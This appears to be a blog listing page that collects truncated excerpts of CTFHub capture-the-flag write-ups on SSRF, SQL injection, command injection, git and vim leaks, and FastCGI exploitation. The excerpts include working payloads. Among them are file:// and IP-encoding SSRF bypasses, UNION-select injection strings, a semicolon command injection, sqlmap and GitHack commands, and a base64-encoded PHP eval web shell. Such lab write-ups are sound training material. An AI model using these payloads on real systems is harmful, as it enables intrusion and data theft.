- 2024-12-24CTFHub中web里的rrsf漏洞实战思路
1.内网访问先来看要求:要求我们访问网址里的flag.php尝试访问下百度,发现可以访问直接访问127.0.0.1下的flag.php文件提交flag,解决内网访问2.伪协议读取文件先看题目要求,要求访问web目录下的文件使用file协议进行访问发现可以访问到,但是没有想要的内容,我们查看源代码将
- 2024-12-20CTFHub-Web-SSRF
1.CTFHub-内网访问输入:http:127.0.0.1/flag.php得到 2.CTFHub-伪协议读取文件输入:file:///var/www/html/flag.php,查看页面的源代码。(该路径为flag.php文件的路径)3.CTFHub-端口扫描 (1)输入http://127.0.0.1:8000发现页面没反应,实行爆破。 (2)进行抓包 (3)清除pa
- 2024-12-18CTFHUB靶场关于SSRF保姆级攻略
一.内网访问输入127.0.0.1/flag.php二.伪协议读取文件输入?url=file:///var/www/html/flag.php右键页面查看源代码三.端口扫描尝试一下index.php,没有显示,说明有这个文件上方题中提示我们端口在8000-9000中我们用burpsuite抓包,开启代理输入?url=127.0.
- 2024-12-17CTFHub-ssrf
技能树--Web--SSRF内网访问开启题目尝试访问位于127.0.0.1的flag.php吧进入环境根据提示输入即可127.0.0.1/flag.php伪协议读取文件开启题目尝试去读取一下Web目录下的flag.php吧进入环境,根据提示输入file:///var/www/html/flag.php鼠标右键查看页面源
- 2024-12-17CTFHUB-web(SSRF)
内网访问点击进入环境,输入http://127.0.0.1/flag.php伪协议读取文件/?url=file:///var/www/html/flag.php右击查看页面源代码端口扫描1.根据题目提示我们知道端口号在8000-9000之间,使用bp抓包并进行爆破POST请求点击环境,访问flag.php查看页
- 2024-12-04CTFHub解题笔记之Web信息泄露篇:5.备份文件下载(vim缓存)
1.题目描述题目位置网页显示2.解题思路Vim是从vi发展出来的一个文本编辑器。在编辑文件的过程中,Vim将会在当前目录中自动生成一个以.swp结尾的临时交换文件,用于备份缓冲区中的内容,以便在意外退出时可以恢复之前编辑的内容。当完成编辑并保存退出后,临时交换文件将会被删除
- 2024-11-26CTFHub信息泄露 git泄露篇
1、log第一步: 点击进入靶场第二步:使用dirsearch工具进行目录扫描发现许多.git第三步: 使用GitHack工具获取.gitpython2GitHack.pyhttp://challenge-5419b9e8f8d29f01.sandbox.ctfhub.com:10800/.git/保存在了/root/GitHack-master/dist/
- 2024-09-01ctfhub-web-SSRF通关攻略
一、内网访问1.打开ctfhub给的环境地址2.观察题目发现让我们访问127.0.0.1下的flag.php在地址栏后面有一个url参数 ?url=http://127.0.0.1/flag.php 提交即可二、伪协议读取文件1.打开ctfhub给的环境2.观察题目发现让我们读取flag.php文件读取文件用到的协议是
- 2024-08-23ctfhub-rce-部分做题记录
命令注入检查网页显示内容,可以直接看到源代码。大致意思是:检查用户输入的GET请求,判断用户是否输入了ip信息。如果输入了ip信息,则使用用户输入的这个ip数据执行一个shell命令"ping-c4"。输入127.0.0.1;cat104211044913917.php没回显,查看源代码过滤cat输入
- 2024-08-23Ctfhub-SSRF部分做题记录
Ctfhub-SSRF部分做题记录上传文件提示:这次需要上传一个文件到flag.php了.祝你好运进入flag.php发现没有提交按钮修改源代码,加个提交按钮抓包修改host为127.0.0.1:80,乱码改成1111(随便,只要不是乱码)PHPimporturllib.parsepayload=\"""POST/flag.phpHTTP/1.1Host
- 2024-08-14Git泄露--------Log
步骤一:虚拟机运行命令:python2GitHack.py后跟网址http://challenge-d9ebdd73f20fda85.sandbox.ctfhub.com:10800/.git步骤二:切换到dist文件下步骤三:查看目录下内容:ls-la步骤四:进入.dist目录下:cd.git步骤五:输入命令查找:gitshow步骤六:复制内容提交FlagStash
- 2024-08-14CTFHub~SQL注入超简单详细教程
0x01整数型注入#本题告诉我们是整数型,所以就很容易了#判断字段数量1orderby2#判断回显点-1unionselect1,2#查询全部数据库名-1unionselect1,group_concat(schema_name)frominformation_schema.schemata#判断数据库中的表名-1unionselec
- 2024-08-13ctfhub UA头注入,refer,过滤空格
-1unionselect1,database()id=-1unionselect1,group_concat(table_name)frominformation_schema.tableswheretable_schema=database()id=-1unionselect1,group_concat(column_name)frominformation_schema.columnswheretable_schema=database()andta
- 2024-08-01ctfhub-sql注入-injection-解题思路
1.打开题目,判断是数字型注入还是字符型注入 1.输入1’ //无回显 1‘ --+//也是没有回显 1” //无回显 1“--= //无回显都没有回显,所以判断为数字型注入2.使用命令进行判断
- 2024-07-26【CTFHub】FastCGI协议
第一步:开启环境后,打开kali虚拟机,第二步:生成一句话木马echo"PD9waHAgQGV2YWwoJF9QT1NUW2NtZF0pOz8+"|base64-d>shell.php第三步:Gopherus-master工具文件中打开终端,输入以下代码python2gopherus.py--exploitfastcgi 第四步将kali里面生成的代码复制进CTF在
- 2024-07-25CTFHUB-SQL注入-1
对于sql注入类型的题,首先判断注入点尝试发现注入点为?id=1'发现联合注入无法回显,尝试使用sqlmap先进行扫描sqlmap-u"http://challenge-1559e706c24187fa.sandbox.ctfhub.com:10800/?id=1'" 查询dbssqlmap-u"http://challenge-1559e706c24187fa.sandbox.ctfhub.co
- 2024-07-25CTFHub技能树 Web-SSRF系列通过全技巧(已完结)
1.内网访问url后面输入http://127.0.0.1/flag.php,得到Flag2.伪协议读取文件url后面输入file:///var/www/html/flag.php,然后右击页面查看页面源代码,得到Flag3.端口扫描第一步:在url后面输入http://127.0.0.1:5000,对本页面抓包,右击抓包界面,发送到Intruder第二
- 2024-07-24web专项
CTF-WEB-CTFhub注:以ctfhub练习网站为例!一:信息泄露1、目录遍历漏洞(1)原理:web服务器或者web应用程序对用户输入的文件名称未进行严格的验证过滤而导致的一种安全漏洞;让攻击者可以利用一些特殊的字符可以绕过服务器的安全限制、访问任意文件;就是没有过滤用户输入的./等目录跳跃符
- 2024-07-24CTFHub-SSRF解析合集
内网访问直接使用http://访问内网获取flag数据伪协议读取文件使用file://绝对路径读取flag.php数据,需要查看网页源代码使用file://绝对路径读取flag.php数据,需要查看网页源代码端口扫描1.打开靶场后访问随机一个端口,抓包2.将抓到的包发送到攻击
- 2024-07-07CTFHUB-彩蛋教程
目录1.首页2.公众号3.题目入口4.writeup5.工具6.赛事7.真题8.投稿提交6:1212:1818:2424:3030:3636:4242:481.首页根据提示,在原始首页查看页面源代码,无发现,经过不断尝试,发现访问api.ctfhub.com有回显api.ctfhub.com右键查看页面源代码,CTRL+F
- 2024-07-07CTFHUB-SSRF-302跳转 Bypass
开启题目,页面空白尝试访问127.0.0.1/flag.php页面?url=127.0.0.1/flag.php提示:不允许企业内部IP访问,使用file协议获取其源码,得到flag.php页面源码?url=file:///var/www/html/flag.php与之前一样,通过REMOTE_ADDR请求头限制本地IP请求,源码中并没有之前的hacker!BanI
- 2024-07-07CTFHUB-SSRF-数字IP Bypass
开启题目,页面空白根据提示,不能使用点分十进制,尝试将127.0.0.1转换为十六进制形式,也就是0x7f000001构造题目有所需Payload?url=0x7f000001/flag.php访问得到了flag八进制:0177.000.000.001十进制:127.0.0.1十六进制:0x7f000001进制转换网址:https://www.bchrt.com/tools
- 2024-07-07CTFHUB-SSRF-URL Bypass
开启题目给出提示,url参数的值中必须包含有http://notfound.ctfhub.com,可以采用@,也就是HTTP基本身份认证绕过HTTP基本身份认证允许Web浏览器或其他客户端程序在请求时提供用户名和口令形式的身份凭证的一种登录验证方式。也就是:http://www.xxx.com@www.yyy.com形